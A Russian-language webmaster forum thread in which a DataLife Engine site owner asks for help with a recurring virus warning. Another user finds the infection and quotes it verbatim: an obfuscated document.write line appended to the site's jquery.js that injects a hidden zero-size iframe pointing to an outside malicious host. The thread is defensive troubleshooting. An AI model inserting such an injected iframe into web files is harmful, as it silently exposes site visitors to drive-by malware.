kamwork 0 Опубликовано: 27 июля 2011 Рассказать Опубликовано: 27 июля 2011 (изменено) Версия DLE стоят 9.3. Из сторонних модулей только sblock. Раньше взламывали сайт, размещали в статьях <script>, в шапке размещали, но все это было легко диагностируемо и как правило помогала свежее обновление программы. Сейчас столкнулся со странной проблемой, при перемещении по сайту или админке, постоянно всплывает что на сайте вирусяка - , просмотрел несколько раз код, уберал все script вообще, не помогало. Убрал тэг - {headers} вирусяка пропадает с клиентской части сайта. В выводимом коде из {headers} нет ни чего криминального, ради эксперимента удалил из engine.php код /* ===================================================== Вывод заголовка страницы ===================================================== */ $titl_e = ''; $nam_e = ''; $rss_url = ''; if ($do == "cat" and $category != '' and $subaction == '') { ... $metatags = <<<HTML <meta http-equiv="Content-Type" content="text/html; charset={$config['charset']}" /> <title>{$metatags['title']} </title> <meta name="description" content="{$metatags['description']}" /> <meta name="keywords" content="{$metatags['keywords']}" /> <meta name="robots" content="all" /> <meta name="revisit-after" content="1 days" /> <link rel="search" type="application/opensearchdescription+xml" href="{$config['http_home_url']}engine/opensearch.php" title="{$config['home_title']}" /> HTML; if ($config['allow_rss']) $metatags .= <<<HTML <link rel="alternate" type="application/rss+xml" title="{$rss_title}" href="{$rss_url}" /> HTML; проблема не исчезла. Подскажите куда и где копать? Версия DataLife Engine: 9.3 Тип лицензии скрипта: Лицензия активирована Режим работы сайта: Включен Операционная система: Linux 2.6.18-194.17.4.el5 Версия PHP: 5.2.14 Версия MySQL: 5.0.77-log MySQLi Информация о GD: GD Version: bundled (2.0.34 compatible), FreeType Support: Enabled, FreeType Linkage: with freetype, T1Lib Support: Disabled, GIF Read Support: Enabled, GIF Create Support: Enabled, JPG Support: Enabled, PNG Support: Enabled, WBMP Support: Enabled, XPM Support: Disabled, XBM Support: Enabled, JIS-mapped Japanese Font Support: Disabled, Module mod_rewrite Неопределено Безопасный режим: Выключен Выделено оперативной памяти: 256M Отключенные функции: Неопределено Максимальный размер загружаемого файла: 1 Gb Размер свободного места на диске: 629,71 Gb Изменено 27 июля 2011 пользователем kamwork Цитата Ссылка на сообщение Поделиться на других сайтах
Einc9o 1 Опубликовано: 27 июля 2011 Рассказать Опубликовано: 27 июля 2011 Читайте правила, сайт в студию Цитата Ссылка на сообщение Поделиться на других сайтах
kamwork 0 Опубликовано: 27 июля 2011 Рассказать Опубликовано: 27 июля 2011 (изменено) Автор Пожалуйста.. pokushay.ru Изменено 27 июля 2011 пользователем kamwork Цитата Ссылка на сообщение Поделиться на других сайтах
Einc9o 1 Опубликовано: 27 июля 2011 Рассказать Опубликовано: 27 июля 2011 зараза спряталась тут http://www.pokushay.ru/engine/classes/js/jquery.js в конце файла ифрейм document.write('<i'+'frame sr'+'c="http://filtrated.in/wu5y3/07.php" width="0" height="0" frameborder="0">'+'</'+'ifram'+'e>'); 1 Цитата Ссылка на сообщение Поделиться на других сайтах
kamwork 0 Опубликовано: 27 июля 2011 Рассказать Опубликовано: 27 июля 2011 Автор Благодарю.. Эти файлы я менял 2а дня назад, когда вылезла подобная проблема, просто тогда я в них ни чего не нашел, и списал это на какой то глюк. Через два дня повтор. Сейчас сменил пароли. Скажите, если на сайт залит шелл, то встроенный антивирус должен показать его ведь? Т.к. это лишний файл? Цитата Ссылка на сообщение Поделиться на других сайтах
Einc9o 1 Опубликовано: 27 июля 2011 Рассказать Опубликовано: 27 июля 2011 должен показать лишний файл, сделай слепок по нему и проверяй Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.